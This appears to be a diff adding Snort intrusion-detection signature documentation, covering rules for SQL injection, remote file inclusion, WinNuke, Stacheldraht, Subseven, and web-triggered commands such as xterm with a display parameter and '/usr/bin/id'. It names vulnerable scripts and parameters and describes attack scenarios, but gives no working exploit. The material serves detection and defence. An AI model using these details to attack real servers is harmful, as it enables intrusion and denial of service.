+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "ignore-pm.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "ignore-pm.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/611.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid: 611
+
+--
+Summary: 
+This event is generated when a remote login attempt using rlogin fails.
+
+--
+Impact: 
+Someone has tried to login using rlogin and failed
+
+-- 
+Detailed Information: 
+This rule generates an event when a login failure message generated by rlogind is seen. rlogin is used on UNIX systems for remote connectivity and remote command execution.  
+
+Multiple events may indicate that an attacker is attempting a brute force password guessing attack.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with rlogin service running and proceeds to guess the password remotely by connecting multiple times.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+A legitimate user may generate an event by entering an incorrect password.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+Arachnids:
+http://www.whitehats.com/info/IDS392
+
+--
--- /dev/null
+++ b/doc/signatures/100000344.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SocketMail" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "site_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "site_path" parameter in the "index.php" script used by the "SocketMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SocketMail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000622.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000622
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "mail_modify.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "mail_modify.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000393.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000393
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "start.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "start.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1257.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1257 
+
+--
+Summary:
+This event is generated when an attempt is made to use WinNuke against a
+host.
+
+--
+Impact:
+Serious. Possible Denial of Service (DoS), this can cause a system to 
+crash or lose network connectivity
+
+--
+Detailed Information:
+An attacker can send a malformed data packet to and networked host over 
+TCP and cause a DoS, loss of network connectivity, or a system crash.
+
+--
+Affected Systems:
+	Windows NT Workstation and Server 4.0
+	Windows NT Workstation and Server 3.5.x
+	Windows 3.1x
+	Windows 95
+--
+Attack Scenarios:
+Program is run against a system in an attempt to knock the system off 
+the network. 
+
+--
+Ease of Attack:
+Simple. An attacker runs WinNuke and enters an IP address of a target 
+system.
+
+--
+False Positives:
+None Known.
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Since there is no known fix for several of the affected operating 
+systems, SMB traffic should be blocked at the firewall and all TCP 
+traffic on ports 139/135 should be dropped.
+ 
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1209.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1209
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1855.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1855
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the a message sent from
+the agent to the handler. This message is used to tell the handler that
+the machine is still alive and able to take requests. The handler will
+then reply with the string "ficken". This traffic differs from the
+traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because the
+packets have an icmp id of 6666 rather than 666 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+ 
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1815.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1815
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1704.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1704
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/884.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+884
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the CGI web application Formmail running on a server.
+
+--
+Impact:
+Several vulnerabilities include server access, information
+disclosure, spam relaying and mail anonymizing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the perl cgi
+script Formmail. Early versions (1.6 and prior) had several vulnerabilities 
+(Spam engine, ability to run commands under server id and set 
+environment variables) and should be upgraded immediately. Newer 
+versions can still be used by spammers for anonymizing email and
+defeating email relay controls.
+
+--
+Affected Systems:
+	All systems running Formmail
+
+--
+Attack Scenarios:
+Information can be appended to the URL to use your
+mail gateway avoiding SMTP relay controls. HTTP header information can
+be manipulated to avoid access control methods in script. Allows SMTP
+exploits that are normally available only to trusted (local) users such
+as Sendmail % hack.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+Legitimate use of the script can cause alerts. Verify
+packet payload and watch web/mailserver logfiles.
+
+--
+False Negatives:
+If the name of the script has been changed this rule will not generate
+an event.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Binsfield (IDS@Safedge.com)
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/107.txt
@@ -0,0 +1,119 @@
+Rule:
+
+--
+Sid:
+107
+
+--
+Summary:
+Subseven22 is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven DEFCON8 2.1 is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	103	subseven 22 (incoming TCP connection)
+	107	subseven DEFCON8 2.1 access (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in 
+".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ 
+folders that use alphanumeric file names. The name of the replicant may 
+be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+http://vil.nai.com/vil/content/v_10566.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/backdoor.subseven22.html
+
+F-Secure:
+http://www.f-secure.com/v-descs/subseven.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/100000100.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+100000100
+
+-- 
+Summary: 
+This event is generated when a URI of 1,050 bytes ore more is requested from an 
+internal web server.
+
+-- 
+
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This rule is used in conjunction with SID 100000101 to detect buffer overflow 
+attacks against the Adobe Acrobat/Acrobat Reader ActiveX Control, pdf.ocx. This 
+rule should never generate an alert.
+
+--
+Affected Systems:
+Adobe Acrobat 5.0
+Adobe Acrobat 5.0.5
+Adobe Acrobat 6.0
+Adobe Acrobat 6.0.1
+Adobe Acrobat Reader 5.0
+Adobe Acrobat Reader 5.0.5
+Adobe Acrobat Reader 5.1
+Adobe Acrobat Reader 6.0
+Adobe Acrobat Reader 6.0.1
+
+--
+
+Attack Scenarios: 
+A web browser or automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as simply typing a long URI into a web browser will suffice.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to Adobe Acrobat/Acrobat Reader 6.0.2.
+An alternate workaround is available: disable "Display PDF in browser" under 
+Edit -> Preferences.
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.adobe.com/support/downloads/thankyou.jsp?ftpID=2589&fileID=2433
+
+--
--- /dev/null
+++ b/doc/signatures/100000595.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000595
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_config.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_config.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1363.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 1363
+
+-- 
+Summary: 
+This event is generated when execution of a common X Window system command is attempted via HTTP.
+
+-- 
+Impact: 
+The attacker may be able to initiate an X session on the web server.
+
+-- 
+Detailed Information: 
+This rule generates an event when an X Windows system command command is used with a parameter to set the display location over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "display" parameter is used to specify an address for the X server to listen for connections. 
+
+The rule looks for the "display" parameter in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the parameter in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+An attacker launches an "xterm" as the web server user and points it to his machine via the 'display" parameter.
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1333.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1333
+
+--
+Summary:
+Attempted id command access via web
+
+--
+Impact:
+Attempt to gain information on users and groups that exist on the host
+using the id command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the users on a webserver.
+id is a UNIX command that will return information about the system's
+users and groups. This information is valuable to an attacker who can
+use it to plan further attacks based on the users possible login
+information or be more effective in targeting specific users and groups
+who possess elevated privileges . The id command will return information
+on the user, the groups the user belings to and the users' "gid" and "uid".
+
+The rule looks for the "id" command in the client to web server network
+traffic and does not indicate whether the command was actually
+successful in showing the user information. The presence of the "id"
+command web traffic indicates that an attacker attempted to trick the
+web server into executing system in non-interactive mode i.e. without a
+valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/usr/bin/id' in the URI which can then return sensitive information on
+groups and users present on the host. 
+
+2. This command may also be requested on a command line should the
+attacker gain access to the machine.
+
+3. An attacker uses a "id" command via a web server connection to test
+what username the web server runs under. He then looks for all the files
+writable by this user and find a web server configuration file with
+wrong permissions.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1332
+
+man id
+
+--
--- /dev/null
+++ b/doc/signatures/1675.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1675
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2197.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2197
+
+--
+Summary:
+This event is generated when an attempt is made to access cvsview2.cgi on an internal web server. This may indicate an attempt to exploit an information disclosure vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in cvsview2.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the cvsview2.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to cvsview2.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses cvsview2.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+--
--- /dev/null
+++ b/doc/signatures/2991.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2991
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
